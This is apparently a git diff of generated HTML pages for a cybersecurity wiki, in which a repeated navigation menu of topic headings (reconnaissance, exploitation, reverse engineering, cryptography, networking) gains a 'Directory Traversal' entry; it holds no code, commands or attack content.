        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -208,22 +208,6 @@

- - diff --git a/docs/Reverse Engineering/Assembly Programming/x86-64/Data Representation.html b/docs/Reverse Engineering/Assembly Programming/x86-64/Data Representation.html index e89ab9ee..36b1f394 100644 --- a/docs/Reverse Engineering/Assembly Programming/x86-64/Data Representation.html +++ b/docs/Reverse Engineering/Assembly Programming/x86-64/Data Representation.html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -189,22 +189,6 @@

Two's Complem - - diff --git a/docs/Reverse Engineering/Assembly Programming/x86-64/Instruction Set.html b/docs/Reverse Engineering/Assembly Programming/x86-64/Instruction Set.html index b803fdbe..2500e50a 100644 --- a/docs/Reverse Engineering/Assembly Programming/x86-64/Instruction Set.html +++ b/docs/Reverse Engineering/Assembly Programming/x86-64/Instruction Set.html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
